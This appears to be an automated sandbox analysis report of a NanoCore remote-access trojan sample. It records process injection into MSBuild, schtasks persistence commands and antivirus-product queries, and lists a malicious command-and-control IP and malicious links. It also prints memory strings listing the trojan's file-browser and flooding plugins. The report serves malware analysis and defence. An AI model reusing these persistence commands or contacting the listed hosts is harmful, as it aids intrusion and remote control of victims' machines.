Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Code function: 0_2_003254B3 __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_003254B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Code function: 0_2_003212F4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_003212F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Code function: 0_2_00322DC2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00322DC2

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: AFE008

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /TN images /XML 'C:\Users\user\AppData\Local\Temp\27c398b5630447af830b2dd2bc343446.xml'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp182E.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp1B1D.tmp'	Jump to behavior

Source: MSBuild.exe, 00000003.00000003.310491763.0000000000DBE000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: MSBuild.exe, 00000003.00000003.280492949.0000000000DB7000.00000004.00000001.sdmp	Binary or memory string: Program Manager (x86)\DHCP Monitor\dhcpmon.exeBuild.exeentImporter, system.workflowservices, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL"/>
Source: MSBuild.exe, 00000003.00000003.310491763.0000000000DBE000.00000004.00000001.sdmp	Binary or memory string: Program Manager (x86)\DHCP Monitor\dhcpmon.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Code function: GetLocaleInfoA,

0_2_00326D6C

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Code function: 0_2_00322B1C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00322B1C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Code function: 0_2_00AB24D4 GetUserNameA,CreateFileW,WriteFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessW,

0_2_00AB24D4

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe PID: 2440, type: MEMORY
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe, 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: MSBuild.exe, 00000003.00000003.228783921.0000000004481000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: MSBuild.exe, 00000003.00000003.228783921.0000000004481000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: MSBuild.exe, 00000003.00000003.228783921.0000000004481000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: MSBuild.exe, 00000003.00000003.228783921.0000000004481000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: MSBuild.exe, 00000003.00000003.228783921.0000000004481000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe PID: 2440, type: MEMORY
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Scheduled Task/Job1	Process Injection212	Masquerading2	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter2	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery121	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Native API1	Logon Script (Mac)	Logon Script (Mac)	Process Injection212	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	Account Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing1	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery23	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	24%	Metadefender		Browse
SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	75%	ReversingLabs	Win32.Exploit.CVE-2017-11882
SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	100%	Avira	TR/ATRAPS.Gen
SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Temp\images.exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\Temp\images.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	0%	Metadefender		Browse
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Temp\images.exe	79%	ReversingLabs	Win32.Backdoor.NanoCore

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack	100%	Avira	TR/ATRAPS.Gen		Download File
0.0.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack	100%	Avira	TR/ATRAPS.Gen		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
209.159.151.5	unknown	United States		19318	IS-AS-1US	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	324206
Start date:	28.11.2020
Start time:	17:48:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Trojan.DownLoader36.7233.23906.21829 (renamed file extension from 21829 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@20/15@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 42.5% (good quality ratio 38.5%) Quality average: 78.8% Quality standard deviation: 31%
HCA Information:	Successful, ratio: 88% Number of executed functions: 120 Number of non-executed functions: 10
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 104.43.139.144, 52.147.198.201, 104.43.193.48, 51.104.139.180, 92.122.144.200, 20.54.26.129, 93.184.221.240, 92.122.213.194, 92.122.213.247, 51.11.168.160 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs.microsoft.com, wu.ec.azureedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. VT rate limit hit for: /opt/package/joesandbox/database/analysis/324206/sample/SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Simulations

Behavior and APIs

Time	Type	Description
17:49:16	Task Scheduler	Run new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" s>$(Arg0)
17:49:16	API Interceptor	956x Sleep call for process: MSBuild.exe modified
17:49:17	Task Scheduler	Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
17:49:18	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
209.159.151.5	Package_details.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
IS-AS-1US	Package_details.exe	Get hash	malicious	Browse	209.159.151.5
	https://bakrisoil.com/wp-content/cd.php?e=gjeffries@hughesellard.com	Get hash	malicious	Browse	104.218.51.229
	baf6b9fcec491619b45c1dd7db56ad3d.exe	Get hash	malicious	Browse	66.45.248.130
	https://encrypt.poweradz.net/	Get hash	malicious	Browse	209.159.158.130
	http://encrypt.poweradz.net	Get hash	malicious	Browse	209.159.158.130
	eLaaw7SqMi.exe	Get hash	malicious	Browse	104.37.188.231
	p8LV1eVFyO.exe	Get hash	malicious	Browse	66.45.248.130
	Invoice_334654_168522_from_Inc.xlsm	Get hash	malicious	Browse	216.219.81.3
	Invoice_403372_917428_from_Inc.xlsm	Get hash	malicious	Browse	216.219.81.3
	IQtvZjIdhN.exe	Get hash	malicious	Browse	66.45.248.130
	Req-87086782-8575.htm	Get hash	malicious	Browse	66.45.228.57
	148wWoi8vI.exe	Get hash	malicious	Browse	66.45.248.130
	wZ6ARBLKPj.exe	Get hash	malicious	Browse	69.10.42.234
	Attachments_240369 475265.doc	Get hash	malicious	Browse	216.219.81.50
	AGENT APPOINTMENT.xlsm	Get hash	malicious	Browse	216.158.225.211
	isb777amx.exe	Get hash	malicious	Browse	66.23.227.135
	https://venushome-my.sharepoint.com/:b:/g/personal/nsh_venushomeappliances_com/EX5FneZcfnZMndmJcDSa_toBsLtKOV-PlkwfYKs_6Hf8sA?e=I7myHO	Get hash	malicious	Browse	206.72.203.52
